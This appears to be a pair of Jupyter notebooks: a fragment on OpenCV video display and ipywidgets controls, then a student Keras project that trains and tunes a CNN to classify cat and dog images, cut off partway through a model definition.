Videohttp://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html
###Code
# test image stack
a = []
for i in range(50):
b = np.zeros((500,500))
b[i:i+100, i:i+100]=1.0
b=b*255
b=b.astype('uint8')
a.append(b)
# video (MPL) (slow, doesn't work well)
# for img in a:
# plt.imshow(img, cmap='gray')
# display.clear_output(wait=True)
# display.display(plt.gcf())
# video (CV2)
cv2.namedWindow('Video',cv2.WINDOW_NORMAL)
for img in a:
b = cv2.imshow('Video',img)
cv2.resizeWindow('Video', 500,500)
cv2.moveWindow('Video',0,0)
display.clear_output(wait=True)
print np.random.randn(1)
if cv2.waitKey(30) >= 0:
break
cv2.destroyAllWindows()
# video with button (CV2)
button = widgets.Button(description='Live')
display.display(button)
def on_button_clicked(b):
for img in a:
cv2.imshow('Video',img)
cv2.waitKey(30)
display.clear_output(wait=True)
print np.random.randn(1)
button.on_click(on_button_clicked)
###Output
_____no_output_____
###Markdown
GUI and BUTTONShttp://docs.opencv.org/2.4/modules/highgui/doc/user_interface.html
###Code
button = widgets.ToggleButton(description='Live', value=False)
def on_click(change):
display.clear_output(wait=True)
print change['new']
button.observe(on_click, names='value')
display.display(button)
import time
b1 = widgets.Button(description='b1')
b2 = widgets.Button(description='b2')
def ctrlloop():
def b1_click(b):
for i in range(10):
print 'b1', i
time.sleep(0.5)
def b2_click(b):
for i in range(10):
print 'b2', i
# dl = widgets.jsdlink((button, 'value'), (vid, 'value'))
b1.on_click(b1_click)
b2.on_click(b2_click)
widgets.HBox([b1,b2])
play = widgets.Play(
interval=160,
value=50,
min=0,
max=100,
step=1,
description="Press play",
disabled=False
)
slider = widgets.IntSlider()
widgets.jslink((play, 'value'), (slider, 'value'))
widgets.HBox([play, slider])
f = open('temp.msg','wb')
f.write(str(1))
f.close()
###Output
_____no_output_____
###Markdown
Arrows
###Code
# icons are from "font-awesome"
x_minus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-left')
x_plus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-right')
y_minus = widgets.Button(
description='',
disabled=False,
button_style='',
icon='arrow-up')
y_plus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-down')
xy_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)])
xy_cluster = widgets.VBox([ widgets.HBox([x_minus,x_plus]), widgets.HBox([y_minus, y_plus]) ])
z_minus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-up')
z_plus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-down')
z_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)])
z_cluster = widgets.VBox([ z_minus, z_plus])
widgets.HBox([xy_cluster, xy_slider, z_cluster, z_slider])
###Output
Widget Javascript not detected. It may not be installed properly. Did you enable the widgetsnbextension? If not, then run "jupyter nbextension enable --py --sys-prefix widgetsnbextension"
|
ProjectCatDog(2).ipynb | ###Markdown
We use keras to build our model, first let us import the package
###Code
import os, cv2, random
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
%matplotlib inline
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
###Output
C:\Users\HH\Anaconda3\lib\site-packages\h5py\__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.
from ._conv import register_converters as _register_converters
Using TensorFlow backend.
###Markdown
Preparing the Data This function resizes the images to 64x64. And we use 25000 images of the data as train sample, 12500 images as test sample. I also separated cats and dogs for exploratory analysis.
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 64
COLS = 64
CHANNELS = 3
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
###Output
Processed 0 of 25000
Processed 2500 of 25000
Processed 5000 of 25000
Processed 7500 of 25000
Processed 10000 of 25000
Processed 12500 of 25000
Processed 15000 of 25000
Processed 17500 of 25000
Processed 20000 of 25000
Processed 22500 of 25000
Processed 0 of 250
Train shape: (25000, 3, 64, 64)
Test shape: (250, 3, 64, 64)
###Markdown
Generating the Labels We're dealing with a binary classification problem here - (1) dog (0) cat. The lables can be created by looping over the file names in the train directory. It's nice to see the training data is perfectly balanced.
###Code
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1,3,64,64)
test = test.reshape(-1,3,64,64)
X_train = train.astype('float64')
X_test = test.astype('float64')
X_train /= 255
X_test /= 255
Y_train = labels
X_valid = X_train[:5000, :, :, :]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000, :, :, :]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
sns.countplot(labels)
plt.title('Cats and Dogs')
###Output
Training matrix shape (19999, 3, 64, 64)
Testing matrix shape (250, 3, 64, 64)
###Markdown
Checking out Cats and Dogs A quick side-by-side comparison of the animals.
###Code
def show_cats_and_dogs(idx):
cat = read_image(train_cats[idx])
dog = read_image(train_dogs[idx])
pair = np.concatenate((cat, dog), axis=1)
plt.figure(figsize=(10,5))
plt.imshow(pair)
plt.show()
for idx in range(0,5):
show_cats_and_dogs(idx)
###Output
_____no_output_____
###Markdown
Build the model A scaled down version of the VGG-16, with a few notable changes. Number of convolution filters cut in half, fully connected (dense) layers scaled down. Set RMSprop as the optimizer. Set binary_crossentropy as the loss function. Set sigmoid as the activation function.
###Code
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.summary()
###Output
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:9: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), input_shape=(3, 64, 64..., activation="relu", padding="same")`
if __name__ == '__main__':
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:10: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), activation="relu", padding="same")`
# Remove the CWD from sys.path while we load stuff.
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:13: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")`
del sys.path[0]
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:14: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:17: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:18: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:21: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:22: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")`
###Markdown
Train Set the epoch number to be 8 and batch size 128
###Code
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The final accuracy is 0.87 This result is not very well. Then we try to change some parameters to see the diffrerence Change the pixel of dataset Resizes the images to 32x32 and change the channels to be 1
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 32
COLS = 32
CHANNELS = 1
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1, 32,32,1)
test = test.reshape(-1, 32,32,1)
X_train = train.astype('float32')
X_test = test.astype('float32')
X_train /= 255
X_test /= 255
Y_train=labels
X_valid = X_train[:5000,:,:,:]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000,:,:,:]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu'))
model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The train accuracy and test accuracy both lower Resizes the images to 256x256 and change the channels to be 3
###Code
import os, cv2, random
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
%matplotlib inline
from keras import backend as K
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
import os, cv2, random
import numpy as np
import pandas as pd
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 256
COLS = 256
ROWS2 = 64
COLS2 = 64
CHANNELS = 3
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
# slice datasets for memory efficiency on Kaggle Kernels, delete if using full dataset
train_images = train_dogs[:10000] + train_cats[:10000]
random.shuffle(train_images)
test_images = test_images[:250]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
b,g,r = cv2.split(img)
img2 = cv2.merge([r,g,b])
return cv2.resize(img2, (ROWS2, COLS2), interpolation=cv2.INTER_CUBIC)
def read_image2(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
b,g,r = cv2.split(img)
img2 = cv2.merge([r,g,b])
return cv2.resize(img2, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS2, COLS2), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
def prep_data2(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image2(image_file)
data[i] = image.T
if i%100 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
test2 = prep_data2(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
sns.countplot(labels)
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Conv2D(32, 3, padding='same', input_shape=train.shape[1:], activation='relu'))
model.add(Conv2D(32, 3, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#print("First layer...")
model.add(Conv2D(64, 3, padding='same', activation='relu'))
model.add(Conv2D(64, 3, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#print("Second layer...")
model.add(Conv2D(128, 3, padding='same', activation='relu'))
model.add(Conv2D(128, 3, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#print("Third layer...")
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
#model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
#model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
#model.add(MaxPooling2D(pool_size=(2, 2)))
#print("Flattening, etc...")
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
print("Compiling model...")
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
print("Creating model:")
model = catdog()
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
epochs =4
batch_size = 128
## Callback for loss logging per epoch
class LossHistory(Callback):
def on_train_begin(self, logs={}):
self.losses = []
self.val_losses = []
def on_epoch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
self.val_losses.append(logs.get('val_loss'))
early_stopping = EarlyStopping(monitor='val_loss', patience=3, verbose=1, mode='auto')
def run_catdog():
history = LossHistory()
print("running model...")
model.fit(train, labels, batch_size=batch_size, epochs=epochs,
validation_split=0.25, verbose=2, shuffle=True, callbacks=[history, early_stopping])
print("making predictions on test set...")
predictions = model.predict(test, verbose=0)
return predictions, history
predictions, history = run_catdog()
loss = history.losses
val_loss = history.val_losses
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.title('VGG-16 Loss Trend')
plt.plot(loss, 'blue', label='Training Loss')
plt.plot(val_loss, 'green', label='Validation Loss')
plt.xticks(range(0,epochs)[0::2])
plt.legend()
plt.show()
###Output
running model...
Train on 15000 samples, validate on 5000 samples
Epoch 1/4
- 155s - loss: 2.2850 - acc: 0.5029 - val_loss: 7.9552 - val_acc: 0.4658
Epoch 2/4
- 159s - loss: 7.8637 - acc: 0.5083 - val_loss: 7.9785 - val_acc: 0.5050
Epoch 3/4
- 162s - loss: 8.1218 - acc: 0.4949 - val_loss: 7.9785 - val_acc: 0.5050
Epoch 4/4
- 160s - loss: 8.0103 - acc: 0.5021 - val_loss: 7.9785 - val_acc: 0.5050
Epoch 00004: early stopping
making predictions on test set...
###Markdown
The train accuracy and test accuracy both become much lower.So the best size should be 64*64. Change Activation Function Change Activation Function from 'relu' to 'sigmoid' A wide variety of sigmoid functions have been used as the activation function of artificial neurons, including the logistic and hyperbolic tangent functions. Sigmoid curves are also common in statistics as cumulative distribution functions (which go from 0 to 1), such as the integrals of the logistic distribution, the normal distribution, and Student's t probability density functions. So we want to try sigmoid function to increase the accuracy
###Code
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='sigmoid'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='sigmoid'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The accuracy is very low so we still use relu as activation function Change the loss function Change the loss function from 'binary_crossentropy' to 'mean_squared_error'. Mean squared error measures the average of the squares of the errors or deviations—that is, the difference between the estimator and what is estimated. MSE is a risk function, corresponding to the expected value of the squared error loss or quadratic loss. The difference occurs because of randomness or because the estimator doesn't account for information that could produce a more accurate estimate.
###Code
optimizer = RMSprop(lr=1e-4)
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='mean_squared_error', optimizer=optimizer)
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
mean_squared_error is also not suitable binary_crossentropy means Logarithmic Loss, or simply Log Loss, is a classification loss function often used as an evaluation metric in kaggle competitions. Since success in these competitions hinges on effectively minimising the Log Loss, it makes sense to have some understanding of how this metric is calculated and how it should be interpreted. Our project is to do classfiction so binary_crossentropy should be the best choice Change the optimizer Change the optimizer from 'RMSprop' to 'adam' RMSprop is an unpublished, adaptive learning rate method proposed by Geoff Hinton in Lecture 6e of his Coursera Class.RMSprop and Adadelta have both been developed independently around the same time stemming from the need to resolve Adagrad's radically diminishing learning rates. Adaptive Moment Estimation (Adam) is another method that computes adaptive learning rates for each parameter. In addition to storing an exponentially decaying average of past squared gradients vt like Adadelta and RMSprop, Adam also keeps an exponentially decaying average of past gradients mt, similar to momentum. Whereas momentum can be seen as a ball running down a slope, Adam behaves like a heavy ball with friction, which thus prefers flat minima in the error surface.
###Code
optimizer = 'adam'
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer='adam', metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
RMSprop is better than adam, so we will choose RMSprop in our best model Change the kernel initalizer Change the kernel_initializer as 'random_uniform'
###Code
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(64,kernel_initializer='random_uniform',bias_initializer='zeros'))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
We get a very low test accuracy Change the convolution filters number Reduce the convolution filters numbers and see the change
###Code
import os, cv2, random
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
%matplotlib inline
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 32
COLS = 32
CHANNELS = 1
train_images = [TRAIN_DIR + i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
test_images = [TEST_DIR + i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i % 2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1, 32,32,1)
test = test.reshape(-1, 32,32,1)
X_train = train.astype('float32')
X_test = test.astype('float32')
X_train /= 255
X_test /= 255
Y_train = labels
X_valid = X_train[:5000, :, :, :]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000, :, :, :]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
def CatDog():
#Neural network model object
model = Sequential()
#First convolution
model.add(Convolution2D(
16, 3, 3,
border_mode = 'same',
input_shape = (ROWS, COLS, CHANNELS),
activation = 'relu'
))
#First dimensionality reduction
